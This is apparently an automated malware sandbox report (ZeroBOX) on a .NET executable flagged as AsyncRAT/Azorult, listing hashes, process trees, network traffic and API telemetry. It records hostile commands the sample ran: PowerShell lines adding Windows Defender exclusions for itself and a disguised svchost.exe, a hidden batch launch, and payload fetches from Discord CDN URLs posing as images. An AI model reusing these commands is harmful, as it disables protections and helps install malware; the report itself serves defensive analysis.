Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Oct. 22, 2021, 9:03 a.m.	Oct. 22, 2021, 9:07 a.m.

Size	58.5KB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`9d4458f6de6fb97b9b2a6ee9a69b62f4`
SHA256	`dfdf48403506835206467e72952fc59fa3fb3c9dabc36090e82979e0b3a624c7`
CRC32	`5C0B77AD`
ssdeep	`768:7Ic6i0vZkrmx1fCYuj47pkoBOBnuvbLsKFIuZEUjqBKWqUYRONr7xV4+syhi:Ec6i0Zx1ru87moesbtnZhWBK+W`
Yara	PE_Header_Zero - PE File Signature Generic_Malware_Zero - Generic Malware IsPE32 - (no description) Is_DotNET_EXE - (no description) Win_Backdoor_AsyncRAT_Zero - Win Backdoor AsyncRAT Win32_Trojan_PWS_Net_1_Zero - Win32 Trojan PWS .NET Azorult

101.exe "C:\Users\test22\AppData\Local\Temp\101.exe"
2948
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\Documents\朓杆朓朏杓朊木朽朊朽朽朻朌朱朊\svchost.exe" -Force
  2800
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\101.exe" -Force
  2624
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\Documents\朓杆朓朏杓朊木朽朊朽朽朻朌朱朊\svchost.exe" -Force
  656
- AdvancedRun.exe "C:\Users\test22\AppData\Local\Temp\49f01170-868e-4fa0-b0e0-7477ab9be03f\AdvancedRun.exe" /EXEFilename "C:\Users\test22\AppData\Local\Temp\49f01170-868e-4fa0-b0e0-7477ab9be03f\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
  2572
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\101.exe" -Force
  3060
- 101.exe C:\Users\test22\AppData\Local\Temp\101.exe
  2492

Name	Response	Post-Analysis Lookup
cdn.discordapp.com	A 162.159.135.233 A 162.159.134.233 A 162.159.129.233 A 162.159.130.233 A 162.159.133.233	162.159.135.233

IP Address	Status	Action
162.159.129.233	Active	Moloch
162.159.135.233	Active	Moloch
164.124.101.2	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49215 -> 162.159.129.233:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49198 -> 162.159.135.233:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49219 -> 162.159.129.233:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.101:49215 162.159.129.233:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da
TLSv1 192.168.56.101:49198 162.159.135.233:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da
TLSv1 192.168.56.101:49219 162.159.129.233:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da

Queries for the computername (25 events)

Time & API	Arguments	Status	Return
GetComputerNameW Oct. 22, 2021, 9:03 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 22, 2021, 9:03 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 22, 2021, 9:03 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 22, 2021, 9:03 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Oct. 22, 2021, 9:03 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 22, 2021, 9:03 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 22, 2021, 9:03 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 22, 2021, 9:03 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 22, 2021, 9:03 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 22, 2021, 9:03 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Oct. 22, 2021, 9:03 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 22, 2021, 9:03 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 22, 2021, 9:03 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 22, 2021, 9:03 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 22, 2021, 9:03 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 22, 2021, 9:03 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Oct. 22, 2021, 9:03 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 22, 2021, 9:03 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 22, 2021, 9:03 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 22, 2021, 9:03 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 22, 2021, 9:03 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 22, 2021, 9:03 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Oct. 22, 2021, 9:03 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 22, 2021, 9:03 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 22, 2021, 9:03 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (6 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Oct. 22, 2021, 9:03 a.m.			0	0
IsDebuggerPresent Oct. 22, 2021, 9:03 a.m.			0	0
IsDebuggerPresent Oct. 22, 2021, 9:03 a.m.			0	0
IsDebuggerPresent Oct. 22, 2021, 9:03 a.m.			0	0
IsDebuggerPresent Oct. 22, 2021, 9:03 a.m.			0	0
IsDebuggerPresent Oct. 22, 2021, 9:03 a.m.			0	0

Command line console output was observed (36 events)

Time & API	Arguments	Status	Return
WriteConsoleW Oct. 22, 2021, 9:03 a.m.	buffer: The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function console_handle: 0x00000023	1	1
WriteConsoleW Oct. 22, 2021, 9:03 a.m.	buffer: , script file, or operable program. Check the spelling of the name, or if a pat console_handle: 0x0000002f	1	1
WriteConsoleW Oct. 22, 2021, 9:03 a.m.	buffer: h was included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW Oct. 22, 2021, 9:03 a.m.	buffer: At line:1 char:17 console_handle: 0x00000047	1	1
WriteConsoleW Oct. 22, 2021, 9:03 a.m.	buffer: + Add-MpPreference <<<< -ExclusionPath C:\Users\Public\Documents\朓杆朓朏杓朊木朽朊朽朽朻朌 console_handle: 0x00000053	1	1
WriteConsoleW Oct. 22, 2021, 9:03 a.m.	buffer: 朱朊\svchost.exe -Force console_handle: 0x0000005f	1	1
WriteConsoleW Oct. 22, 2021, 9:03 a.m.	buffer: + CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co console_handle: 0x0000006b	1	1
WriteConsoleW Oct. 22, 2021, 9:03 a.m.	buffer: mmandNotFoundException console_handle: 0x00000077	1	1
WriteConsoleW Oct. 22, 2021, 9:03 a.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x00000083	1	1
WriteConsoleW Oct. 22, 2021, 9:03 a.m.	buffer: The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function console_handle: 0x00000023	1	1
WriteConsoleW Oct. 22, 2021, 9:03 a.m.	buffer: , script file, or operable program. Check the spelling of the name, or if a pat console_handle: 0x0000002f	1	1
WriteConsoleW Oct. 22, 2021, 9:03 a.m.	buffer: h was included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW Oct. 22, 2021, 9:03 a.m.	buffer: At line:1 char:17 console_handle: 0x00000047	1	1
WriteConsoleW Oct. 22, 2021, 9:03 a.m.	buffer: + Add-MpPreference <<<< -ExclusionPath C:\Users\test22\AppData\Local\Temp\101. console_handle: 0x00000053	1	1
WriteConsoleW Oct. 22, 2021, 9:03 a.m.	buffer: exe -Force console_handle: 0x0000005f	1	1
WriteConsoleW Oct. 22, 2021, 9:03 a.m.	buffer: + CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co console_handle: 0x0000006b	1	1
WriteConsoleW Oct. 22, 2021, 9:03 a.m.	buffer: mmandNotFoundException console_handle: 0x00000077	1	1
WriteConsoleW Oct. 22, 2021, 9:03 a.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x00000083	1	1
WriteConsoleW Oct. 22, 2021, 9:03 a.m.	buffer: The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function console_handle: 0x00000023	1	1
WriteConsoleW Oct. 22, 2021, 9:03 a.m.	buffer: , script file, or operable program. Check the spelling of the name, or if a pat console_handle: 0x0000002f	1	1
WriteConsoleW Oct. 22, 2021, 9:03 a.m.	buffer: h was included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW Oct. 22, 2021, 9:03 a.m.	buffer: At line:1 char:17 console_handle: 0x00000047	1	1
WriteConsoleW Oct. 22, 2021, 9:03 a.m.	buffer: + Add-MpPreference <<<< -ExclusionPath C:\Users\Public\Documents\朓杆朓朏杓朊木朽朊朽朽朻朌 console_handle: 0x00000053	1	1
WriteConsoleW Oct. 22, 2021, 9:03 a.m.	buffer: 朱朊\svchost.exe -Force console_handle: 0x0000005f	1	1
WriteConsoleW Oct. 22, 2021, 9:03 a.m.	buffer: + CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co console_handle: 0x0000006b	1	1
WriteConsoleW Oct. 22, 2021, 9:03 a.m.	buffer: mmandNotFoundException console_handle: 0x00000077	1	1
WriteConsoleW Oct. 22, 2021, 9:03 a.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x00000083	1	1
WriteConsoleW Oct. 22, 2021, 9:03 a.m.	buffer: The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function console_handle: 0x00000023	1	1
WriteConsoleW Oct. 22, 2021, 9:03 a.m.	buffer: , script file, or operable program. Check the spelling of the name, or if a pat console_handle: 0x0000002f	1	1
WriteConsoleW Oct. 22, 2021, 9:03 a.m.	buffer: h was included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW Oct. 22, 2021, 9:03 a.m.	buffer: At line:1 char:17 console_handle: 0x00000047	1	1
WriteConsoleW Oct. 22, 2021, 9:03 a.m.	buffer: + Add-MpPreference <<<< -ExclusionPath C:\Users\test22\AppData\Local\Temp\101. console_handle: 0x00000053	1	1
WriteConsoleW Oct. 22, 2021, 9:03 a.m.	buffer: exe -Force console_handle: 0x0000005f	1	1
WriteConsoleW Oct. 22, 2021, 9:03 a.m.	buffer: + CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co console_handle: 0x0000006b	1	1
WriteConsoleW Oct. 22, 2021, 9:03 a.m.	buffer: mmandNotFoundException console_handle: 0x00000077	1	1
WriteConsoleW Oct. 22, 2021, 9:03 a.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x00000083	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 196 events)

Time & API	Arguments	Status	Return
CryptExportKey Oct. 22, 2021, 9:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e60d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2021, 9:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e60d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2021, 9:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e60d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2021, 9:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e60d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2021, 9:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e6150 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2021, 9:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e6150 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2021, 9:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e6050 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2021, 9:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e6050 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2021, 9:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e6050 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2021, 9:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e6a90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2021, 9:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e6b10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2021, 9:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e6b10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2021, 9:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0059fcb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2021, 9:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a0230 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2021, 9:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a0230 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2021, 9:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a0230 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2021, 9:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a0430 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2021, 9:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a0430 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2021, 9:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a0430 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2021, 9:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a0430 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2021, 9:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a0430 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2021, 9:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a0430 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2021, 9:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0059fc70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2021, 9:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0059fc70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2021, 9:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0059fc70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2021, 9:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a0230 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2021, 9:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a0230 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2021, 9:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a0230 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2021, 9:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0059f870 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2021, 9:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a0230 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2021, 9:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a0230 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2021, 9:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a0230 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2021, 9:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a0230 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2021, 9:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a0230 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2021, 9:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a0230 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2021, 9:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a0230 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2021, 9:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a05b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2021, 9:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a05b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2021, 9:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a05b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2021, 9:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a05b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2021, 9:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a05b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2021, 9:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a05b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2021, 9:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a05b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2021, 9:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a05b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2021, 9:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a05b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2021, 9:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a05b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2021, 9:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a05b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2021, 9:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a05b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2021, 9:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a05b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2021, 9:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a05b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Tries to locate where the browsers are installed (1 event)

file	C:\Program Files (x86)\Google\Chrome\Application\65.0.3325.181\libegl.dll

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Oct. 22, 2021, 9:03 a.m.		1	1	0

One or more processes crashed (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ Oct. 22, 2021, 9:03 a.m.	stacktrace: CopyPDBs+0x1b552 DllCanUnloadNowInternal-0x25a85 clr+0x1b1194 @ 0x728f1194 LogHelp_TerminateOnAssert+0x14061 GetPrivateContextsPerfCounters-0x53e1 clr+0x82ba1 @ 0x727c2ba1 mscorlib+0x2f45a5 @ 0x6ff345a5 mscorlib+0x2f46fc @ 0x6ff346fc mscorlib+0x2f4688 @ 0x6ff34688 0x6b02bd 0x6b00af DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72742652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7275264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72752e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x728074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72807610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72891dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72891e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72891f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7289416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7376f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x743c7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x743c4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xe0434f4e exception.offset: 46887 exception.address: 0x76a7b727 registers.esp: 3338084 registers.edi: 0 registers.eax: 3338084 registers.ebp: 3338164 registers.edx: 0 registers.ebx: 4577152 registers.esi: 3893408 registers.ecx: 1996117021	1	0	0

Time & API

Arguments

Status

Return

Repeated

__exception__

Oct. 22, 2021, 9:03 a.m.

stacktrace:

CopyPDBs+0x1b552 DllCanUnloadNowInternal-0x25a85 clr+0x1b1194 @ 0x728f1194
LogHelp_TerminateOnAssert+0x14061 GetPrivateContextsPerfCounters-0x53e1 clr+0x82ba1 @ 0x727c2ba1
mscorlib+0x2f45a5 @ 0x6ff345a5
mscorlib+0x2f46fc @ 0x6ff346fc
mscorlib+0x2f4688 @ 0x6ff34688
0x6b02bd
0x6b00af
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72742652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7275264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72752e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x728074ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72807610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72891dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72891e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72891f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7289416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7376f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x743c7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x743c4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0xe0434f4e
exception.offset: 46887
exception.address: 0x76a7b727
registers.esp: 3338084
registers.edi: 0
registers.eax: 3338084
registers.ebp: 3338164
registers.edx: 0
registers.ebx: 4577152
registers.esi: 3893408
registers.ecx: 1996117021

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (2 events)

suspicious_features	GET method with no useragent header				suspicious_request	GET https://cdn.discordapp.com/attachments/893177342426509335/900715748136214588/400C23D9.jpg
suspicious_features	GET method with no useragent header				suspicious_request	GET https://cdn.discordapp.com/attachments/893177342426509335/900715750510166056/4E05CD6C.jpg

Performs some HTTP requests (2 events)

request	GET https://cdn.discordapp.com/attachments/893177342426509335/900715748136214588/400C23D9.jpg
request	GET https://cdn.discordapp.com/attachments/893177342426509335/900715750510166056/4E05CD6C.jpg

Allocates read-write-execute memory (usually to unpack itself) (50 out of 574 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Oct. 22, 2021, 9:03 a.m.	process_identifier: 2948 region_size: 851968 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005c0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2021, 9:03 a.m.	process_identifier: 2948 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00650000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 22, 2021, 9:03 a.m.	process_identifier: 2948 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72741000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 22, 2021, 9:03 a.m.	process_identifier: 2948 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72742000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2021, 9:03 a.m.	process_identifier: 2948 region_size: 1441792 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a80000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2021, 9:03 a.m.	process_identifier: 2948 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ba0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2021, 9:03 a.m.	process_identifier: 2948 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00512000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2021, 9:03 a.m.	process_identifier: 2948 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0052c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
